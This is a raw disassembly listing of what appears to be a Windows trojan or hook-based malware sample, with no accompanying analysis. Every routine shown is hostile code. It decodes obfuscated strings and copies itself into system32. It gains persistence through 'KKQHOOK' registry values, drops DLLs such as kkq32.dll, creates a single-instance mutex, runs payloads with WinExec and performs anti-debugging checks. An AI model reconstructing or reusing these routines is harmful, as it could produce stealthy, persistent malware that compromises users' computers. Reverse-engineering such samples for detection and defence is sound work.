call sub_4015B0
mov [ebp+var_46BC], 740Eh
mov eax, [ebp+var_46BC]
mov edx, eax
add edx, eax
mov [ebp+var_46BC], edx
lea eax, [ebp+var_400]
push eax
call sub_40355C
add esp, 1Ch
lea edi, [ebp+var_46F7]
lea esi, aKdb ; ",kd"
mov ecx, 5
rep movsb
call sub_408C55
mov [ebp+var_46D1], 49h
add [ebp+var_46D1], 71h
loc_409E9E: ; CODE XREF: sub_409883+5AB�j
and [ebp+var_35B4], 0
mov [ebp+var_46B8], 4
lea eax, [ebp+var_46D0]
push eax
lea eax, [ebp+var_46B8]
push eax
lea eax, [ebp+var_35B4]
push eax
push offset aOfstkkqc ; "ofstkkqc"
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_401490
add esp, 18h
mov [ebp+var_46C0], 393Ch
mov eax, [ebp+var_46C0]
mov edx, eax
add edx, eax
mov [ebp+var_46C0], edx
push 0
push 0
push 4
push 0
push 0
push 80000000h
push offset dword_40DFE0
call sub_40C650 ; CreateFileA
mov [ebp+var_46C8], eax
push 0
push eax
call sub_40C4D0 ; GetFileSize
mov [ebp+var_46E8], eax
mov [ebp+var_46D8], 164Ah
add [ebp+var_46D8], 351Ah
push [ebp+var_46C8]
call sub_40C530 ; CloseHandle
call sub_40C518 ; GetProcessHeap
mov eax, [ebp+var_46E8]
cmp [ebp+var_35B4], eax
jb short loc_409F5E
call sub_40C518 ; GetProcessHeap
jmp loc_40A074
; ---------------------------------------------------------------------------
loc_409F5E: ; CODE XREF: sub_409883+6CF�j
lea edi, [ebp+var_46FD]
lea esi, aZn7? ; "zN7?>"
mov ecx, 3
rep movsw
mov eax, 17h
sub eax, dword_43C098
push eax
lea eax, [ebp+var_46B2]
push eax
call sub_4016D2
push 9
push offset aVyVQhu ; " vY v+qhu"
call sub_40129C
lea edi, [ebp+var_46B2]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push eax
lea edi, [ebp+var_400]
push edi
call sub_40C9D4
lea eax, [ebp+var_400]
push eax
call sub_4034C6
lea edi, [ebp+var_46FE]
lea esi, byte_4469FB
xor ecx, ecx
inc ecx
rep movsb
push 1
push offset aT ; "t"
call sub_40129C
lea edi, [ebp+var_604]
push edi
push 0
push [ebp+var_35B4]
push eax
push offset aKkqhook ; "KKQHOOK"
lea edi, [ebp+var_400]
push edi
lea edi, [ebp+var_45B3]
push edi
push offset dword_40DFE0
call sub_4062A9
mov ebx, eax
call sub_40C4C4 ; GetCurrentThreadId
lea eax, [ebp+var_400]
push eax
call sub_40C488 ; DeleteFileA
mov [ebp+var_46DC], 375Ch
add [ebp+var_46DC], 732Ch
lea eax, [ebp+var_400]
push eax
call sub_40355C
add esp, 50h
call sub_40C518 ; GetProcessHeap
or ebx, ebx
jz short loc_40A074
call sub_40C518 ; GetProcessHeap
cmp [ebp+var_604], 0
jz short loc_40A074
push 4
push 4
lea eax, [ebp+var_604]
push eax
push offset aOfstkkqc ; "ofstkkqc"
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_4015B0
add esp, 18h
loc_40A074: ; CODE XREF: sub_409883+6D6�j
; sub_409883+7BF�j ...
call sub_408C55
mov [ebp+var_46DD], 6
add [ebp+var_46DD], 1
push 0
push 80h
push 3
push 0
push 0
push 80000000h
push offset dword_414EF0
call sub_40C650 ; CreateFileA
mov [ebp+var_46CC], eax
call sub_40C4E8 ; RtlGetLastWin32Error
cmp [ebp+var_46CC], 0FFFFFFFFh
jz loc_40A5CE
push [ebp+var_46CC]
call sub_40C530 ; CloseHandle
mov [ebp+var_46DE], 9Ch
add [ebp+var_46DE], 1
lea eax, [ebp+var_45B3]
push eax
lea eax, [ebp+var_F08]
push eax
call sub_40C9D4
push 6
push offset aAhu87 ; ":ahu87"
call sub_40129C
push eax
lea edi, [ebp+var_F08]
push edi
call sub_40C9F8
call sub_40C548 ; GetTickCount
lea eax, [ebp+var_400]
push eax
call sub_4034C6
mov [ebp+var_46C4], 2B7Eh
mov eax, [ebp+var_46C4]
mov edx, eax
add edx, eax
mov [ebp+var_46C4], edx
mov eax, dword_43C094
add eax, 7
push eax
lea eax, [ebp+var_46B2]
push eax
call sub_4016D2
call sub_40C518 ; GetProcessHeap
push 9
push offset aVyVAdq ; " vY v+adq"
call sub_40129C
lea edi, [ebp+var_46B2]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push eax
lea edi, [ebp+var_400]
push edi
call sub_40C9D4
call sub_40C4B8 ; GetCurrentProcessId
push 1
push offset aT ; "t"
call sub_40129C
lea edi, [ebp+var_604]
push edi
push 0
push [ebp+var_35B4]
push eax
push offset aKkqhook ; "KKQHOOK"
lea edi, [ebp+var_400]
push edi
lea edi, [ebp+var_F08]
push edi
push offset dword_414EF0
call sub_4062A9
mov ebx, eax
call sub_40C554 ; GetVersion
lea eax, [ebp+var_400]
push eax
call sub_40C488 ; DeleteFileA
mov [ebp+var_46E4], 1915h
mov eax, 2D3Eh
mul [ebp+var_46E4]
mov [ebp-4704h], eax
mov [ebp+var_46E4], eax
lea eax, [ebp+var_400]
push eax
call sub_40355C
add esp, 68h
call sub_40C4E8 ; RtlGetLastWin32Error
or ebx, ebx
jz short loc_40A220
mov [ebp+var_4708], 1CBh
add [ebp+var_4708], 1932h
push offset dword_414EF0
call sub_40C488 ; DeleteFileA
lea edi, [ebp+var_4710]
lea esi, a8a5 ; "`<$8a5!"
movsd
movsd
loc_40A220: ; CODE XREF: sub_409883+460�j
; sub_409883+96F�j
cmp [ebp+var_259C], 3Ah
jnz loc_40A41C
cmp [ebp+var_2599], 3Ah
jnz loc_40A41C
mov [ebp+var_35B8], 41E8h
sub [ebp+var_35B8], 31EAh
lea edi, [ebp+var_35BF]
lea esi, aXern ; "<xerN "
mov ecx, 7
rep movsb
mov [ebp+var_2599], 0
push 5
push offset a?57p ; "? 57p"
call sub_40129C
lea edi, [ebp+var_35B4]
push edi
push eax
lea edi, [ebp+var_259C]
push edi
call sub_40C9EC
add esp, 14h
call sub_40C518 ; GetProcessHeap
cmp [ebp+var_35B4], 0
jz short loc_40A2C2
call sub_40C9BC
mov edx, 621B97C3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov edi, eax
inc edi
cmp edi, [ebp+var_35B4]
ja loc_40A587
loc_40A2C2: ; CODE XREF: sub_409883+A14�j
lea edi, [ebp+var_35C7]
lea esi, a9aZ59 ; "9A |Z59"
movsd
movsd
cmp ds:dword_419730, 2
jnz short loc_40A330
call sub_40C4E8 ; RtlGetLastWin32Error
push 400h
lea eax, [ebp+var_400]
push eax
call sub_40C524 ; GetSystemDirectoryA
push 0Ah
push offset aVyfhaUlc ; " vYfha+ulc"
call sub_40129C
lea edi, [ebp+var_400]
push edi
push eax
lea edi, [ebp+var_1010]
push edi
call sub_40C9D4
push 8
push offset aYfha ; "Yfha+`}`"
call sub_40129C
push eax
lea edi, [ebp+var_400]
push edi
call sub_40C9F8
add esp, 24h
jmp loc_40A3D0
; ---------------------------------------------------------------------------
loc_40A330: ; CODE XREF: sub_409883+A54�j
call sub_40C5D8 ; IsDebuggerPresent
push 400h
lea eax, [ebp+var_400]
push eax
call sub_40C578 ; GetWindowsDirectoryA
mov [ebp+var_35CC], 49BBh
movzx eax, [ebp+var_35CC]
imul eax, 6EEBh
mov [ebp+var_35CC], ax
push 0Eh
push offset aVyfjhhdkaUlc ; " vYfjhhdka+ulc"
call sub_40129C
lea edi, [ebp+var_400]
push edi
push eax
lea edi, [ebp+var_1010]
push edi
call sub_40C9D4
mov [ebp+var_35CA], 6711h
movzx eax, [ebp+var_35CA]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_35CA], ax
push 0Ch
push offset aYfjhhdkaFjh ; "Yfjhhdka+fjh"
call sub_40129C
push eax
lea edi, [ebp+var_400]
push edi
call sub_40C9F8
add esp, 24h
lea edi, [ebp+var_35D2]
lea esi, a?0n ; "?>%0N"
mov ecx, 3
rep movsw
loc_40A3D0: ; CODE XREF: sub_409883+AA8�j
lea eax, [ebp+var_1010]
push eax
call sub_40C488 ; DeleteFileA
push 8
push offset aVFV ; " v%*F% v"
call sub_40129C
lea edi, [ebp+var_259C]
add edi, 4
push edi
lea edi, [ebp+var_400]
push edi
push eax
lea edi, [ebp+var_400]
push edi
call sub_40C9D4
add esp, 18h
call sub_40C4E8 ; RtlGetLastWin32Error
push 0
lea eax, [ebp+var_400]
push eax
call sub_40C6BC ; WinExec
loc_40A41C: ; CODE XREF: sub_409883+9A4�j
; sub_409883+9B1�j
push 5
push offset aRpua ; "rpua%"
call sub_40129C
mov edi, 2
sub edi, dword_43C094
push edi
push eax
lea edi, [ebp+var_259C]
push edi
call sub_4017D2
add esp, 14h
or eax, eax
jnz loc_40A587
mov ax, word_446A19
mov [ebp+var_55B6], ax
lea edi, [ebp+var_55BE]
lea esi, byte_446A1B
movsd
movsd
mov eax, 16h
sub eax, dword_43C098
push eax
lea eax, [ebp+var_703]
push eax
call sub_4016D2
call sub_40C4B8 ; GetCurrentProcessId
push 9
push offset aVyVAdq ; " vY v+adq"
call sub_40129C
lea edi, [ebp+var_703]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push eax
lea edi, [ebp+var_45AF]
push edi
call sub_40C9D4
call sub_40C518 ; GetProcessHeap
lea edi, [ebp+var_55C6]
lea esi, aVchcV ; "|Vchc$V"
mov ecx, 2
rep movsd
lea eax, [ebp+var_2597]
push eax
lea eax, [ebp+var_55AE]
push eax
call sub_40C45C
push 3
push offset aA7 ; "}a7"
call sub_40129C
mov [ebp+var_55CC], eax
push 1
push offset aT ; "t"
call sub_40129C
push 0
push 0
push 0
push eax
mov edi, [ebp+var_55CC]
push edi
lea edi, [ebp+var_45AF]
push edi
lea edi, [ebp+var_55AE]
push edi
push 0
call sub_4062A9
add esp, 50h
mov ebx, eax
mov [ebp+var_55B4], 42DEh
sub [ebp+var_55B4], 5934h
cmp ebx, 2
jnz short loc_40A587
call sub_40C4E8 ; RtlGetLastWin32Error
push 0
lea eax, [ebp+var_45AF]
push eax
call sub_40C6BC ; WinExec
push 6
push offset aKRsW ; "k`rs`w"
call sub_40129C
mov edi, 10h
sub edi, dword_43C098
push edi
push eax
lea edi, [ebp+var_55AE]
push edi
call sub_4017D2
add esp, 14h
cmp eax, 0FFFFh
jz short loc_40A587
mov eax, 10h
sub eax, dword_43C098
push eax
call sub_40C980
pop ecx
loc_40A587: ; CODE XREF: sub_409883+310�j
; sub_409883+321�j ...
lea eax, [ebp+var_600]
push eax
push [ebp+var_708]
push [ebp+var_F0C]
call sub_401B83
add esp, 0Ch
mov [ebp+var_708], eax
or eax, eax
jnz loc_409B98
push [ebp+var_F0C]
call sub_40C608 ; LocalFree
lea edi, [ebp+var_1144]
lea esi, aWc ; " Wc"
mov ecx, 5
rep movsb
loc_40A5CE: ; CODE XREF: sub_409883+276�j
; sub_409883+2DB�j ...
call sub_408C55
mov [ebp+var_1019], 51h
movzx eax, [ebp+var_1019]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1019], al
fld dbl_446C34
fimul dword_43C0B8
mov edi, eax
call sub_40C3B4
xchg eax, edi
push edi
call sub_40C974
mov edi, dword_43C0BC
sub edi, eax
inc edi
mov [ebp+var_1014], edi
call sub_40C5D8 ; IsDebuggerPresent
mov eax, edi
mov [ebp-15A0h], eax
push eax
call sub_40C974
add esp, 8
mov edi, [ebp-15A0h]
add edi, eax
mov [ebp+var_1014], edi
mov eax, edi
mov edi, dword_43C0BC
sub edi, dword_43C0B8
mov ecx, edi
inc ecx
xor edx, edx
div ecx
mov [ebp+var_15A4], eax
mov [ebp+var_1014], eax
call sub_40C9BC
mov [ebp+var_15A8], eax
mov eax, dword_43C0B8
mov edx, 66666667h
push ecx
mov ecx, eax
imul edx
sar edx, 1
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
lea edi, [eax+eax*4]
mov esi, [ebp+var_1014]
mov edx, [ebp+var_15A8]
mov eax, esi
imul eax, [ebp+var_15A8]
mov ecx, 0Ah
cdq
idiv ecx
lea edi, [edi+edx+5]
mov dword_43C0B8, edi
mov eax, dword_43C0BC
cmp edi, eax
jbe short loc_40A6B9
and dword_43C0B8, 0
loc_40A6B9: ; CODE XREF: sub_409883+E2D�j
push 30D40h
call sub_40C95C
pop ecx
mov [ebp+var_101B], 8Ah
movzx eax, [ebp+var_101B]
imul eax, 7565h
mov [ebp+var_101B], al
jmp loc_409900
sub_409883 endp
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A6EA proc near ; CODE XREF: sub_40A74E+11�p
var_B = byte ptr -0Bh
var_8 = dword ptr -8
var_2 = word ptr -2
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
lea edi, [ebp+var_B]
lea esi, aJ_0 ; "J-"
mov ecx, 3
rep movsb
mov [ebp+var_2], 26CEh
add [ebp+var_2], 6DD5h
push offset aKkqhook_30 ; "KKQHOOK_30"
push 0
push 1F0001h
call sub_40C614 ; OpenMutexA
mov [ebp+var_8], eax
or eax, eax
jz short loc_40A74A
call sub_40C4E8 ; RtlGetLastWin32Error
push [ebp+var_8]
call sub_40C530 ; CloseHandle
call sub_40C548 ; GetTickCount
mov eax, 10h
sub eax, dword_43C098
push eax
call sub_40C980
pop ecx
loc_40A74A: ; CODE XREF: sub_40A6EA+3A�j
pop edi
pop esi
leave
retn
sub_40A6EA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A74E proc near ; CODE XREF: sub_40C3D8+5C�p
var_7BD = byte ptr -7BDh
var_7B8 = dword ptr -7B8h
var_7B3 = byte ptr -7B3h
var_7B1 = byte ptr -7B1h
var_7AD = byte ptr -7ADh
var_7AC = byte ptr -7ACh
var_7A6 = byte ptr -7A6h
var_7A0 = byte ptr -7A0h
var_798 = byte ptr -798h
var_792 = dword ptr -792h
var_78E = byte ptr -78Eh
var_787 = word ptr -787h
var_785 = byte ptr -785h
var_780 = dword ptr -780h
var_77C = word ptr -77Ch
var_77A = byte ptr -77Ah
var_779 = byte ptr -779h
var_774 = byte ptr -774h
var_770 = word ptr -770h
var_76E = byte ptr -76Eh
var_766 = byte ptr -766h
var_667 = byte ptr -667h
var_568 = byte ptr -568h
var_464 = dword ptr -464h
var_460 = dword ptr -460h
var_45C = byte ptr -45Ch
var_358 = dword ptr -358h
var_353 = byte ptr -353h
var_352 = word ptr -352h
var_350 = dword ptr -350h
var_34C = dword ptr -34Ch
var_346 = word ptr -346h
var_344 = byte ptr -344h
var_2E0 = byte ptr -2E0h
var_27C = word ptr -27Ch
var_279 = byte ptr -279h
var_278 = dword ptr -278h
var_274 = dword ptr -274h
var_26E = word ptr -26Eh
var_26C = word ptr -26Ch
var_26A = word ptr -26Ah
var_268 = byte ptr -268h
var_164 = word ptr -164h
var_162 = byte ptr -162h
var_161 = byte ptr -161h
var_5D = byte ptr -5Dh
var_5C = dword ptr -5Ch
var_55 = dword ptr -55h
var_51 = dword ptr -51h
var_4D = dword ptr -4Dh
var_49 = dword ptr -49h
var_45 = dword ptr -45h
var_41 = dword ptr -41h
var_3D = dword ptr -3Dh
var_39 = dword ptr -39h
var_35 = dword ptr -35h
var_31 = dword ptr -31h
var_2D = byte ptr -2Dh
var_27 = byte ptr -27h
var_26 = byte ptr -26h
var_25 = byte ptr -25h
var_1D = byte ptr -1Dh
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 7C0h
push ebx
push esi
push edi
call sub_40C4C4 ; GetCurrentThreadId
call sub_40A6EA
lea edi, [ebp+var_76E]
lea esi, aXu1gH ; "XU&1G'H"
movsd
movsd
push 104h
lea eax, [ebp+var_161]
push eax
call sub_40C524 ; GetSystemDirectoryA
push 13h
push offset aYawlsWvykalvwa ; "Yawls`wvYkalvwa+v|v"
call sub_40129C
push eax
lea edi, [ebp+var_161]
push edi
call sub_40C9F8
add esp, 10h
mov [ebp+var_162], 86h
movzx eax, [ebp+var_162]
imul eax, 1511h
mov [ebp+var_162], al
push 0
push 0
push 3
push 0
push 0
push 80000001h
lea eax, [ebp+var_161]
push eax
call sub_40C650 ; CreateFileA
mov [ebp+var_358], eax
cmp eax, 0FFFFFFFFh
jnz short loc_40A7E6
call sub_408581
jmp short loc_40A7F1
; ---------------------------------------------------------------------------
loc_40A7E6: ; CODE XREF: sub_40A74E+8F�j
push [ebp+var_358]
call sub_40C530 ; CloseHandle
loc_40A7F1: ; CODE XREF: sub_40A74E+96�j
call sub_40C5D8 ; IsDebuggerPresent
push 9
push offset aKdgiAvc ; "`kdgi`avc"
call sub_40129C
push eax
call sub_40C584 ; GlobalAddAtomA
call sub_40C4B8 ; GetCurrentProcessId
mov eax, [ebp+arg_0]
mov ds:dword_41EB6C, eax
mov ds:dword_419720, 94h
call sub_40C4C4 ; GetCurrentThreadId
push offset dword_419720
call sub_40C560 ; GetVersionExA
call sub_40C5D8 ; IsDebuggerPresent
push 0FFh
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
call sub_40C524 ; GetSystemDirectoryA
call sub_40C518 ; GetProcessHeap
call sub_40C548 ; GetTickCount
push eax
call sub_40C9E0
call sub_40C554 ; GetVersion
mov ax, word_446A3B
mov [ebp+var_770], ax
push 104h
lea eax, [ebp+var_45C]
push eax
push [ebp+arg_0]
call sub_40C4F4 ; GetModuleFileNameA
mov [ebp+var_164], 72Eh
add [ebp+var_164], 4E05h
and [ebp+var_5C], 0
mov [ebp+var_460], 4
call sub_40C4C4 ; GetCurrentThreadId
lea eax, [ebp+var_774]
push eax
lea eax, [ebp+var_460]
push eax
lea eax, [ebp+var_5C]
push eax
push offset aKkqhook ; "KKQHOOK"
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_401490
add esp, 24h
mov [ebp+var_464], eax
test eax, eax
jz short loc_40A90F
call sub_40C4E8 ; RtlGetLastWin32Error
cmp [ebp+var_5C], 1Eh
jbe short loc_40A8ED
mov eax, 10h
sub eax, dword_43C098
push eax
call sub_40C980
pop ecx
loc_40A8ED: ; CODE XREF: sub_40A74E+18B�j
call sub_40C4C4 ; GetCurrentThreadId
cmp [ebp+var_5C], 1Eh
jz loc_40AA7C
lea edi, [ebp+var_7B3]
lea esi, aYHny ; "y~^HNY"
mov ecx, 7
rep movsb
loc_40A90F: ; CODE XREF: sub_40A74E+180�j
lea edi, [ebp+var_779]
lea esi, aV6ta ; "V6ta"
mov ecx, 5
rep movsb
lea edi, [ebp+var_77A]
lea esi, byte_446A49
xor ecx, ecx
inc ecx
rep movsb
call sub_40C9BC
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov edi, eax
add edi, 41h
mov edx, edi
mov [ebp+var_2D], dl
mov [ebp+var_5D], 0B7h
movzx eax, [ebp+var_5D]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_5D], al
mov [ebp+var_1], 1
jmp short loc_40A99B
; ---------------------------------------------------------------------------
loc_40A96E: ; CODE XREF: sub_40A74E+252�j
call sub_40C9BC
movzx edi, [ebp+var_1]
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov esi, eax
add esi, 61h
mov edx, esi
mov [ebp+edi+var_2D], dl
add [ebp+var_1], 1
loc_40A99B: ; CODE XREF: sub_40A74E+21E�j
mov al, [ebp+var_1]
cmp al, 8
jbe short loc_40A96E
call sub_40C518 ; GetProcessHeap
mov [ebp+var_25], 0
call sub_40C9BC
mov edx, eax
test dl, 1
jnz short loc_40A9D0
lea edi, [ebp+var_7AD]
lea esi, byte_446A4A
xor ecx, ecx
inc ecx
rep movsb
mov [ebp+var_27], 33h
mov [ebp+var_26], 32h
loc_40A9D0: ; CODE XREF: sub_40A74E+267�j
push 9
push offset aVyV ; " vY v+`}`"
call sub_40129C
lea edi, [ebp+var_2D]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push eax
lea edi, [ebp+var_268]
push edi
call sub_40C9D4
mov ax, word_446A4B
mov [ebp+var_77C], ax
push 0
lea eax, [ebp+var_268]
push eax
lea eax, [ebp+var_45C]
push eax
call sub_40C5F0 ; CopyFileA
lea eax, [ebp+var_2D]
push eax
call sub_403D18
mov [ebp+var_5C], 1Eh
push 4
push 4
lea eax, [ebp+var_5C]
push eax
push offset aKkqhook ; "KKQHOOK"
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_4015B0
add esp, 34h
push 0
lea eax, [ebp+var_268]
push eax
call sub_40C6BC ; WinExec
call sub_40C4B8 ; GetCurrentProcessId
call sub_4041B6
call sub_40C554 ; GetVersion
mov eax, 10h
sub eax, dword_43C098
push eax
call sub_40C494 ; ExitProcess
mov eax, dword_446A4D
mov [ebp+var_780], eax
loc_40AA7C: ; CODE XREF: sub_40A74E+1A8�j
push 5
push offset aVyV_0 ; " vY v"
call sub_40129C
push offset aKkq32_dll ; "kkq32.dll"
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push eax
push offset dword_41FB70
call sub_40C9D4
mov [ebp+var_26A], 4374h
movzx eax, [ebp+var_26A]
imul eax, 5336h
mov [ebp+var_26A], ax
push 5
push offset aVyV_0 ; " vY v"
call sub_40129C
push offset aDnkkq_dll ; "dnkkq.dll"
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push eax
push offset dword_40F0A0
call sub_40C9D4
mov [ebp+var_26C], 79A5h
movzx eax, [ebp+var_26C]
imul eax, 40AAh
mov [ebp+var_26C], ax
push 5
push offset aVyV_0 ; " vY v"
call sub_40129C
push offset aDatkkq32_dll ; "datkkq32.dll"
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push eax
push offset dword_40DFE0
call sub_40C9D4
push 0FFh
push offset dword_414EF0
call sub_40C578 ; GetWindowsDirectoryA
mov [ebp+var_26E], 1DA7h
add [ebp+var_26E], 3CACh
push 9
push offset aYgjjqVV ; "Ygjjq+v|v"
call sub_40129C
push eax
push offset dword_414EF0
call sub_40C9F8
call sub_40C548 ; GetTickCount
lea eax, aKkqhook ; "KKQHOOK"
mov [ebp+var_31], eax
call sub_40C518 ; GetProcessHeap
mov eax, ds:dword_41EB6C
mov [ebp+var_45], eax
lea eax, sub_40B090
mov [ebp+var_51], eax
push 7F00h
push 0
call sub_40C770 ; LoadCursorA
mov [ebp+var_3D], eax
lea edi, [ebp+var_785]
lea esi, aMZ ; "M/#Z"
mov ecx, 5
rep movsb
push 7F03h
push 0
call sub_40C788 ; LoadIconA
mov [ebp+var_41], eax
and [ebp+var_35], 0
push 0
call sub_40C86C ; GetStockObject
mov [ebp+var_39], eax
mov [ebp+var_274], 3FEFh
inc [ebp+var_274]
mov [ebp+var_55], 3
and [ebp+var_4D], 0
and [ebp+var_49], 0
lea eax, [ebp+var_55]
push eax
call sub_40C818 ; RegisterClassA
mov [ebp+var_278], 525Ah
mov eax, 4BA5h
mul [ebp+var_278]
mov [ebp-7B0h], eax
mov [ebp+var_278], eax
push 0
push ds:dword_41EB6C
push 0
push 0
push 0
push 0
push 0
push 0
push 0CA0000h
push offset aKkqhook ; "KKQHOOK"
push offset aKkqhook ; "KKQHOOK"
push 0
call sub_40C83C ; CreateWindowExA
mov ds:dword_41C900, eax
mov [ebp+var_279], 6Fh
sub [ebp+var_279], 9Fh
push offset aKkqhook_30 ; "KKQHOOK_30"
push 0
push 0
call sub_40C6D4 ; CreateMutexA
mov [ebp+var_27C], 7954h
sub [ebp+var_27C], 69B5h
push 2
call sub_402AD6
add esp, 5Ch
call sub_40C548 ; GetTickCount
call sub_40C554 ; GetVersion
cmp eax, 80000000h
jb short loc_40ACEF
call sub_40C548 ; GetTickCount
push 0Ch
push offset aNWkI67Aii ; "n`wk`i67+aii"
call sub_40129C
push eax
call sub_40C500 ; GetModuleHandleA
mov edi, eax
push 16h
push offset aWBlvqWvWslfUwj ; "W`blvq`wV`wslf`Uwjf`vv"
call sub_40129C
add esp, 10h
push eax
push edi
call sub_40C50C ; GetProcAddress
mov [ebp+var_7B8], eax
mov [ebp+var_7B1], 68h
movzx eax, [ebp+var_7B1]
imul eax, 1515h
mov [ebp+var_7B1], al
call sub_40C4B8 ; GetCurrentProcessId
mov edi, 10h
sub edi, dword_43C098
push edi
push eax
call [ebp+var_7B8]
lea edi, [ebp+var_7BD]
lea esi, a4nvc ; "4NC"
mov ecx, 5
rep movsb
loc_40ACEF: ; CODE XREF: sub_40A74E+525�j
mov ax, word_446A5B
mov [ebp+var_787], ax
push 104h
lea eax, [ebp+var_568]
push eax
push 0
call sub_40C4F4 ; GetModuleFileNameA
call sub_40C518 ; GetProcessHeap
lea eax, [ebp+var_568]
push eax
call sub_4034C6
call sub_40C554 ; GetVersion
push offset dword_41FB70
call sub_4034C6
call sub_40C5D8 ; IsDebuggerPresent
push offset dword_40F0A0
call sub_4034C6
call sub_40C4B8 ; GetCurrentProcessId
push offset dword_40DFE0
call sub_4034C6
call sub_40C4B8 ; GetCurrentProcessId
push eax
call sub_403780
call sub_40C4C4 ; GetCurrentThreadId
lea edi, [ebp+var_78E]
lea esi, aWwwl4u ; "Wwwl4u"
mov ecx, 7
rep movsb
lea eax, [ebp+var_2E0]
push eax
call sub_403A7B
mov [ebp+var_346], 6459h
inc [ebp+var_346]
and [ebp+var_34C], 0
mov [ebp+var_350], 64h
mov ebx, 65BCh
mov eax, ebx
add eax, ebx
mov ebx, eax
push 45h
push offset aVjcqrdwYhlfw_0 ; "Vjcqrdw`YHlfwjvjcqYRlkajrvYFpww`kqS`wvl"...
call sub_40129C
lea edi, [ebp+var_34C]
push edi
lea edi, [ebp+var_350]
push edi
lea edi, [ebp+var_344]
push edi
lea edi, [ebp+var_2E0]
push edi
push eax
push 80000002h
call sub_401490
push 1
push offset aN_1 ; "N"
call sub_40129C
push eax
lea edi, [ebp+var_344]
push edi
call sub_403883
call sub_40C554 ; GetVersion
push 1
push offset aS_0 ; "S"
call sub_40129C
push eax
lea edi, [ebp+var_2E0]
push edi
call sub_403883
mov eax, dword_446A64
mov [ebp+var_792], eax
lea edi, [ebp+var_798]
lea esi, aYiso ; "`YIsO"
mov ecx, 3
rep movsw
push 17h
push offset aFivlayVylkuwjf ; "FIVLAY vYLkUwjfV`ws`w67"
call sub_40129C
lea edi, [ebp+var_344]
push edi
push eax
lea edi, [ebp+var_766]
push edi
call sub_40C9D4
call sub_40C5D8 ; IsDebuggerPresent
lea eax, [ebp+var_34C]
push eax
lea eax, [ebp+var_350]
push eax
lea eax, [ebp+var_667]
push eax
push 0
lea eax, [ebp+var_766]
push eax
push 80000000h
call sub_401490
call sub_40C5D8 ; IsDebuggerPresent
lea eax, [ebp+var_667]
push eax
call sub_4034C6
lea edi, [ebp+var_7A0]
lea esi, aN@bln5p ; "N@bLn5P"
mov ecx, 2
rep movsd
call sub_403B8E
lea edi, [ebp+var_7A6]
lea esi, word_446A76
mov ecx, 3
rep movsw
push offset sub_40815F
call sub_407FE2
add esp, 8Ch
mov [ebp+var_352], 277Bh
add [ebp+var_352], 57F7h
lea eax, [ebp+var_7AC]
push eax
push 0
push 0
push offset sub_409883
push 0
push 0
call sub_40C704 ; CreateThread
push eax
call sub_40C530 ; CloseHandle
mov [ebp+var_353], 40h
movzx eax, [ebp+var_353]
imul eax, 28BCh
mov [ebp+var_353], al
push 0
mov eax, dword_43C094
add eax, 1F3h
push eax
mov eax, 10h
sub eax, dword_43C098
push eax
push ds:dword_41C900
call sub_40C77C ; SetTimer
jmp short loc_40AF66
; ---------------------------------------------------------------------------
loc_40AF3C: ; CODE XREF: sub_40A74E+829�j
lea edi, [ebp+var_7B8+1]
lea esi, aO3@ ; " $o~3@"
mov ecx, 7
rep movsb
lea eax, [ebp+var_1D]
push eax
call sub_40C7E8 ; TranslateMessage
lea eax, [ebp+var_1D]
push eax
call sub_40C7F4 ; DispatchMessageA
call sub_40C5D8 ; IsDebuggerPresent
loc_40AF66: ; CODE XREF: sub_40A74E+7EC�j
push 0
push 0
push 0
lea eax, [ebp+var_1D]
push eax
call sub_40C7A0 ; GetMessageA
or eax, eax
jnz short loc_40AF3C
pop edi
pop esi
pop ebx
leave
retn 10h
sub_40A74E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AF80 proc near ; DATA XREF: sub_408EFF+8C5�o
; sub_408EFF+8EE�o ...
var_18 = dword ptr -18h
var_E = byte ptr -0Eh
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
lea edi, [ebp+var_6]
lea esi, byte_446A83
xor ecx, ecx
inc ecx
rep movsb
mov eax, [ebp+arg_4]
cmp eax, 100h
jz short loc_40AFB4
jmp short loc_40B015
; ---------------------------------------------------------------------------
mov [ebp+var_18], 140Fh
add [ebp+var_18], 7C4Bh
loc_40AFB4: ; CODE XREF: sub_40AF80+22�j
cmp [ebp+arg_8], 9
jnz short loc_40B015
call sub_40C4E8 ; RtlGetLastWin32Error
cmp ebx, ds:dword_410630
jnz short loc_40AFD2
push ds:dword_432DC4
call sub_40C758 ; SetFocus
loc_40AFD2: ; CODE XREF: sub_40AF80+45�j
cmp ebx, ds:dword_432DC4
